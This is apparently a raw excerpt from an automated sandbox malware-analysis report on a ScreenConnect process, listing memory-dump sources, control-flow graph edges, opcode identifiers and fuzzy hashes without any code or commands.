                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5a821e445a643fcec984237fd933e4fa0a96282f5f64a3c0c50d0ea0c094f65c
                                                                                                                                                  • Instruction ID: feaff8edd85bb543f54e24dced1062baf4c8cd0d95a0c4dd1494a9e2ab1a4024
                                                                                                                                                  • Opcode Fuzzy Hash: 5a821e445a643fcec984237fd933e4fa0a96282f5f64a3c0c50d0ea0c094f65c
                                                                                                                                                  • Instruction Fuzzy Hash: 1FA1C757B0D7D25BE7A2962C58F64E93FD0EF5322C71A00B7C688CE093ED0D684BA251

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Mw4$Hg4$Pg4$Xg4
                                                                                                                                                  • API String ID: 0-1620713507
                                                                                                                                                  • Opcode ID: bbb2906fbe9c378863f486ce0a0480ed0ae6af762dadb9d0f54cbff16048f4cd
                                                                                                                                                  • Instruction ID: 447cd4c0f2edc015ff5d03fceae7f408b029300d3fbc18a32195c9381b4fda54
                                                                                                                                                  • Opcode Fuzzy Hash: bbb2906fbe9c378863f486ce0a0480ed0ae6af762dadb9d0f54cbff16048f4cd
                                                                                                                                                  • Instruction Fuzzy Hash: 5C51B372B0DA454FEBD8DE18D4A06B43BD1FF95318F1401BAD44DDB282DA29F8428741

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 441 7ffd34a84e89-7ffd34a84ebb 445 7ffd34a84ecd-7ffd34a84efb 441->445 446 7ffd34a84ebd-7ffd34a84ec0 441->446 454 7ffd34a84f02-7ffd34a84f29 445->454 447 7ffd34a84f73-7ffd34a84f9a 446->447 448 7ffd34a84ec6-7ffd34a84ec8 446->448 452 7ffd34a84f9c-7ffd34a84fb0 447->452 453 7ffd34a84f2b-7ffd34a84f71 447->453 451 7ffd34a84fd8-7ffd34a84fdd 448->451 456 7ffd34a84fb2-7ffd34a84fc7 452->456 457 7ffd34a84fcc-7ffd34a84fd6 452->457 453->451 454->452 454->453 456->457 457->451
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: g4$g4
                                                                                                                                                  • API String ID: 0-2050786409
                                                                                                                                                  • Opcode ID: 5276616b44efd6c867c313e8c963444df97e58b96602435ba3ef1e394bb41e2e
                                                                                                                                                  • Instruction ID: 1e769809691d4e5898d95756daa3472be67a714d0e7d1ba0774e374cd4134529
                                                                                                                                                  • Opcode Fuzzy Hash: 5276616b44efd6c867c313e8c963444df97e58b96602435ba3ef1e394bb41e2e
                                                                                                                                                  • Instruction Fuzzy Hash: 8A419471708A894FDBC4DF28C8A4AA53B91FF59318B2445AED56EC72D2DB35EC12CB01

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2439040245.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34770000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                  • Opcode ID: 5940d4ed6f6e0f4ba044b5562d74f3028c715459a10cbbe331511ec627923b82
                                                                                                                                                  • Instruction ID: fec5a041fc3833dd2de1e207b173b873dcf57996a8e5dbe0dc3707bfcb46e14f
                                                                                                                                                  • Opcode Fuzzy Hash: 5940d4ed6f6e0f4ba044b5562d74f3028c715459a10cbbe331511ec627923b82
                                                                                                                                                  • Instruction Fuzzy Hash: B4412971A0CB498FD715AFA89C4A5F9BBE0EF56310F04417EE449C3192DE68B846CBD1

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 559 7ffd34a84875-7ffd34a84881 560 7ffd34a84883 559->560 561 7ffd34a84885-7ffd34a848a1 559->561 560->561 562 7ffd34a848c5-7ffd34a848cb 560->562 563 7ffd34a848a8-7ffd34a848aa 561->563 564 7ffd34a848e4-7ffd34a848f9 562->564 565 7ffd34a848cd-7ffd34a848e2 562->565 566 7ffd34a848b0-7ffd34a848c3 563->566 567 7ffd34a84939-7ffd34a84942 563->567 571 7ffd34a84943-7ffd34a84982 564->571 572 7ffd34a848fb-7ffd34a84936 564->572 565->564 566->562 576 7ffd34a84984 571->576 577 7ffd34a849cc-7ffd34a849cf 571->577 572->567 580 7ffd34a84985-7ffd34a84991 576->580 581 7ffd34a849d1 577->581 582 7ffd34a84a4b 577->582 585 7ffd34a849d3-7ffd34a849db 581->585 586 7ffd34a84a17-7ffd34a84a24 581->586 584 7ffd34a84a4c-7ffd34a84a57 582->584 594 7ffd34a84a58-7ffd34a84a59 584->594 585->584 588 7ffd34a849dd-7ffd34a849df 585->588 587 7ffd34a84a27-7ffd34a84a4a 586->587 587->582 591 7ffd34a849e1 588->591 592 7ffd34a84a5b-7ffd34a84a64 588->592 591->587 595 7ffd34a849e3-7ffd34a849e7 591->595 593 7ffd34a84a66-7ffd34a84a6a 592->593 596 7ffd34a84a6f-7ffd34a84a78 593->596 594->592 595->594 597 7ffd34a849e9-7ffd34a849ee 595->597 601 7ffd34a84a7d-7ffd34a84a98 596->601 597->596 598 7ffd34a849f0-7ffd34a849f5 597->598 598->593 600 7ffd34a849f7-7ffd34a849fc 598->600 600->601 602 7ffd34a849fe-7ffd34a84a12 600->602 605 7ffd34a84bb8-7ffd34a84bca 601->605 607 7ffd34a84a9e-7ffd34a84aa4 601->607 602->586 602->605 607->605 608 7ffd34a84aaa-7ffd34a84ab0 607->608 608->605 609 7ffd34a84ab6-7ffd34a84abc 608->609 609->605 610 7ffd34a84ac2-7ffd34a84b42 609->610 610->605 618 7ffd34a84b44-7ffd34a84b59 call 7ffd34a83878 610->618 621 7ffd34a84b5e-7ffd34a84b60 618->621 621->605 622 7ffd34a84b62-7ffd34a84b7e call 7ffd34a83878 621->622 622->605 626 7ffd34a84b80-7ffd34a84b88 622->626 626->605 627 7ffd34a84b8a-7ffd34a84bb7 call 7ffd34a83878 626->627
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: P'x4
                                                                                                                                                  • API String ID: 0-286885776
                                                                                                                                                  • Opcode ID: 1ee3b16268eddcf90f81d440f89bd94be51dcec7e0e3ff0d4e556d6ba589d799
                                                                                                                                                  • Instruction ID: d68752b324c6165ec28f0cde292cb990a7869da5c84ab4da40e0e545c7c1c7ef
                                                                                                                                                  • Opcode Fuzzy Hash: 1ee3b16268eddcf90f81d440f89bd94be51dcec7e0e3ff0d4e556d6ba589d799
                                                                                                                                                  • Instruction Fuzzy Hash: D0B12E32B0C94A4BEBA4EB1888A25F57BD1EF66318B6401BED54DC7183FD1CF9068781
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4
                                                                                                                                                  • API String ID: 0-4088798008
                                                                                                                                                  • Opcode ID: 4755125305a34eb81a799899f8b4033479e0979374961a3df093f2c809742c1d
                                                                                                                                                  • Instruction ID: d6827b7f4dcab1eea9eedec0d0ec2e5c3cdd7a33fc4863a77bb62d9569020335
                                                                                                                                                  • Opcode Fuzzy Hash: 4755125305a34eb81a799899f8b4033479e0979374961a3df093f2c809742c1d
                                                                                                                                                  • Instruction Fuzzy Hash: 4731282BB0D6925BD711B7ACF4A74EE7F94DF4332DB0800B7D28CDA053DD19205A9291
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Lw4
                                                                                                                                                  • API String ID: 0-320171606
                                                                                                                                                  • Opcode ID: 184b00794ff452c8fa1903862426cea789ecf7109e17b5f91bc48c86b2322f6b
                                                                                                                                                  • Instruction ID: 2543ea3a663a876dc16e1958e57d9b48b96008a667133fc376c7d3ca3974f2bf
                                                                                                                                                  • Opcode Fuzzy Hash: 184b00794ff452c8fa1903862426cea789ecf7109e17b5f91bc48c86b2322f6b
                                                                                                                                                  • Instruction Fuzzy Hash: CE31E772B0DD894FEFC9DB2888606683BD1FF9A308B1440A9E55DD72D3DE28E8018B45
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: `jy4
                                                                                                                                                  • API String ID: 0-2154516707
                                                                                                                                                  • Opcode ID: 2fe2ed4f73cb705c94c4458c4b69288b4501ea8e4074c8268cf85be58cd5e26b
                                                                                                                                                  • Instruction ID: dd170106f3ee5c20fb1741078ad8afc7b34b3f3e99f0136c038a2b979d5328f9
                                                                                                                                                  • Opcode Fuzzy Hash: 2fe2ed4f73cb705c94c4458c4b69288b4501ea8e4074c8268cf85be58cd5e26b
                                                                                                                                                  • Instruction Fuzzy Hash: A521E025B0E9664FE7E9972848B02757AD6EF87309F6440B6D14EC76E2CD0CA806A350
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 32ae88c3b3b8120da27b5b4b75ac8ac8c6323339900f89a174a948ed20cd905b
                                                                                                                                                  • Instruction ID: 5cd2fa03377a62f005711a20a86d04d53a5cd513cf9d12cf8879bc7daf296d97
                                                                                                                                                  • Opcode Fuzzy Hash: 32ae88c3b3b8120da27b5b4b75ac8ac8c6323339900f89a174a948ed20cd905b
                                                                                                                                                  • Instruction Fuzzy Hash: C3122A71B0DE4A4FEB989B6888A56B87BD1EF55304F1440BED50EC71D3DE28AC46D780
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4174e3aa78a5b6648c655c0f8c51165dcf30289528df4a4bfc5d57e365de3e78
                                                                                                                                                  • Instruction ID: 635eb3f51755399171f0937d7d8aaacd7b80ffbba82ec6445c0231f3ef99d367
                                                                                                                                                  • Opcode Fuzzy Hash: 4174e3aa78a5b6648c655c0f8c51165dcf30289528df4a4bfc5d57e365de3e78
                                                                                                                                                  • Instruction Fuzzy Hash: 95A1B230B5851A8BEB98EB58C8B67FD7AA1FF65300F50417CD14ED32C2DE2C69468B91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 66ba039047281b9e72069398eb10a2ef1d0742f59d30fc19ae3c356d1a9acd70
                                                                                                                                                  • Instruction ID: 069114c61b88942b24ea48a81ed39baba43802e7578ef66f21291f8ea9a9b4e6
                                                                                                                                                  • Opcode Fuzzy Hash: 66ba039047281b9e72069398eb10a2ef1d0742f59d30fc19ae3c356d1a9acd70
                                                                                                                                                  • Instruction Fuzzy Hash: EB71E932A0CD0A4BDFA8EB14C8A29F577D1FF65304BA0417DD55EC7582EE28F90A8781
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6b721ee96e20dd070d41efa763437746b8cde119139476a5cdc9b530ab4f5f60
                                                                                                                                                  • Instruction ID: 9e5cd7042ce2ba00041b23810c56493dcb2231ffab6d6f642e160adb6dcd7655
                                                                                                                                                  • Opcode Fuzzy Hash: 6b721ee96e20dd070d41efa763437746b8cde119139476a5cdc9b530ab4f5f60
                                                                                                                                                  • Instruction Fuzzy Hash: 2D818971708A4D8FDFD4DF18C8A4AA93BE1FF59318B240669E45DD7292CB39E842CB41
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 852fdb6e9a44d9b1c9d3c64c21d8736677d61c2301455b6285781324d428480b
                                                                                                                                                  • Instruction ID: e8195f8207e1f72f99d1a879a6acb87c20928ed49c510dcddb3c7a151c1081fd
                                                                                                                                                  • Opcode Fuzzy Hash: 852fdb6e9a44d9b1c9d3c64c21d8736677d61c2301455b6285781324d428480b
                                                                                                                                                  • Instruction Fuzzy Hash: 87614A37B0DD594BEBA19A695CA11E9BFD1EF96309F14017AD15CC3193DE28AC02C741
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 280db8d8546bb19e57a22b0d3db8f950a8b7aa7af4988bc5ce513e9f972bc038
                                                                                                                                                  • Instruction ID: 1a9936b5006608076144182fab1bfdad8e417a0de69a0ffd28542e119ea36313
                                                                                                                                                  • Opcode Fuzzy Hash: 280db8d8546bb19e57a22b0d3db8f950a8b7aa7af4988bc5ce513e9f972bc038
                                                                                                                                                  • Instruction Fuzzy Hash: 6961A3717089454FE798EB2C84A5BA97BE1FF9A314F14407EE14EC72E3DE28A8069741
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8cb6e10883f5e83e8567c9342a5d241e553df2f25e433260e9f304a8088077d7
                                                                                                                                                  • Instruction ID: 304a5c4ad2cc3273cd892d1989db9b07878bcda72476dfde10a091bc7e621ff8
                                                                                                                                                  • Opcode Fuzzy Hash: 8cb6e10883f5e83e8567c9342a5d241e553df2f25e433260e9f304a8088077d7
                                                                                                                                                  • Instruction Fuzzy Hash: 83515761B1DE964FEB96A72C58A95787BD1EF9A314B5801BAD04DC32D3DD1CBC028382
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 776ed3cebb93700773b959274bc035e5f925c625de82b26225419a29951d765d
                                                                                                                                                  • Instruction ID: 094f3509d8439b12b282dd2c84d5607b4eeea13b6c1bbc85c3744980a32f2971
                                                                                                                                                  • Opcode Fuzzy Hash: 776ed3cebb93700773b959274bc035e5f925c625de82b26225419a29951d765d
                                                                                                                                                  • Instruction Fuzzy Hash: 03510634709A068FDBDCEF18C0A46A577E1FF99308B3449A9C15DCB686CA25E843D740
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 179c88b2559b6daf809156e5667db0fbbcc9ea43b8733a4e62599fed5820f36b
                                                                                                                                                  • Instruction ID: 3bd43ef18e121aa2bbeca839f9059bf2afa44054552e3fb8ffbc063896cfb7f9
                                                                                                                                                  • Opcode Fuzzy Hash: 179c88b2559b6daf809156e5667db0fbbcc9ea43b8733a4e62599fed5820f36b
                                                                                                                                                  • Instruction Fuzzy Hash: 6241D73170CA464FE794EB2884A97BA7BD9EF9A304F25457AD04EC32D3CD2CAC419741
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6a9e589ed8f0a0bd04183209cf74a35106d3060f8b8dd2d58b9883ce89e82c2a
                                                                                                                                                  • Instruction ID: 88b6e03a355da3458be2c892f55534ee3ff1fa24e0264e46f58b764d0f8270af
                                                                                                                                                  • Opcode Fuzzy Hash: 6a9e589ed8f0a0bd04183209cf74a35106d3060f8b8dd2d58b9883ce89e82c2a
                                                                                                                                                  • Instruction Fuzzy Hash: 8841557161DA894FDBD4DF18C8B49653BE1FF99308B140199E46DC72D6CB39E812CB01
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: dc1abea3f415ba39000257ab4baf953b37097e53e990db0cacf65ad55f49f769
                                                                                                                                                  • Instruction ID: 8e5e96e50566ff523a18de2e1d69086fbfa769218d78bdb1bbb8ee46ff26044c
                                                                                                                                                  • Opcode Fuzzy Hash: dc1abea3f415ba39000257ab4baf953b37097e53e990db0cacf65ad55f49f769
                                                                                                                                                  • Instruction Fuzzy Hash: C541BBA3A097965FE751B7ACA4F70EA3BA4DF5322CB0801B7D1C8CA093ED1964564681
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d60f3c8e30a2959fd194407340b4c2188d5f46187e169c6ea08031a28fb7cd5a
                                                                                                                                                  • Instruction ID: 390df61864b9b30f7f7d95ac04c1f970a14ed7476bd87484eb37ae91c562d682
                                                                                                                                                  • Opcode Fuzzy Hash: d60f3c8e30a2959fd194407340b4c2188d5f46187e169c6ea08031a28fb7cd5a
                                                                                                                                                  • Instruction Fuzzy Hash: 3A310831B18E4E8FDB91DB2C98541EA7BD1FF4A324F440176D40DD3292DE29E8118382
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: af84f12b88d1164b20bd128c740415ed444e72a309b3ebb30a2345ebed41b871
                                                                                                                                                  • Instruction ID: 10b95d223b90b56ac5469222964b3fc119beb46f9a8b11fe47daf4241cd10071
                                                                                                                                                  • Opcode Fuzzy Hash: af84f12b88d1164b20bd128c740415ed444e72a309b3ebb30a2345ebed41b871
                                                                                                                                                  • Instruction Fuzzy Hash: D9315062A1CE850FE7A8A62858691A97FD0EFA6714F04007FE54DC72D3DD1CBC054782
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 809671bbffdc880869c257f06ba91d4d5b6ca76709a66b31fffe1891e6bf3ce7
                                                                                                                                                  • Instruction ID: ccd3ff0b4cc8d0cb16184b1322d70d2989abe10d570795770573ac648a4386e0
                                                                                                                                                  • Opcode Fuzzy Hash: 809671bbffdc880869c257f06ba91d4d5b6ca76709a66b31fffe1891e6bf3ce7
                                                                                                                                                  • Instruction Fuzzy Hash: B5313F71708A4D8FDFD4DF18C4A4AA937E1FF69318B2406A9E51ED7296CB35E842CB40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6af04ebc5a0efa3634a111e62f1aa359a38129a145b2516368524be0f8a731b7
                                                                                                                                                  • Instruction ID: 2d44ac1a4c3f58cdfd6826cc6e8c5c9fbc00b2fdf20ceeb5220ea654c5458525
                                                                                                                                                  • Opcode Fuzzy Hash: 6af04ebc5a0efa3634a111e62f1aa359a38129a145b2516368524be0f8a731b7
                                                                                                                                                  • Instruction Fuzzy Hash: 7531E873F0DE894BEBD59A2818711E93F91EF56318F5810ABE65CD7292DE2DE8009341
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3d515eb73b17210ba8af2efbee3d6ad172d4d0fc9f5e70e3042446cbb2e788d6
                                                                                                                                                  • Instruction ID: 880fa7202bb2857dfe3338ae81dd05231e3cfe7ba8962e796225e9afbe07e57c
                                                                                                                                                  • Opcode Fuzzy Hash: 3d515eb73b17210ba8af2efbee3d6ad172d4d0fc9f5e70e3042446cbb2e788d6
                                                                                                                                                  • Instruction Fuzzy Hash: 3821E122B1DA4A0BE7E4E66C58A62B47BC5FF6A314F5500BAD54CC72C3ED5DAC818381
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 744605ad8bab2eef3787c5bd28cc15775bdc0f729ef26fdd21647104f63eedbc
                                                                                                                                                  • Instruction ID: 5ed714e65920193a3b3b0e7454f8d9f904588579279b44532878791201378ae4
                                                                                                                                                  • Opcode Fuzzy Hash: 744605ad8bab2eef3787c5bd28cc15775bdc0f729ef26fdd21647104f63eedbc
                                                                                                                                                  • Instruction Fuzzy Hash: ED212062B1DF850BE7A8961C4C696697BD0EFA5714F0401AFE54DC72D3ED28BC0587C2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4c6f092516b848201f247a34a616cbfd77d3547407afe9e21700bb9064fff7fb
                                                                                                                                                  • Instruction ID: 2a5ea05fb9d8beb9ae880bce0020ed45d7c557bd54b6776a3b47a7b9c46b9cfc
                                                                                                                                                  • Opcode Fuzzy Hash: 4c6f092516b848201f247a34a616cbfd77d3547407afe9e21700bb9064fff7fb
                                                                                                                                                  • Instruction Fuzzy Hash: 3921E63160DE894FE7A69B259C641A57FE1FF86318B1801BBD189C7193DE2CA842C751
                                                                                                                                                  Memory Dump Source
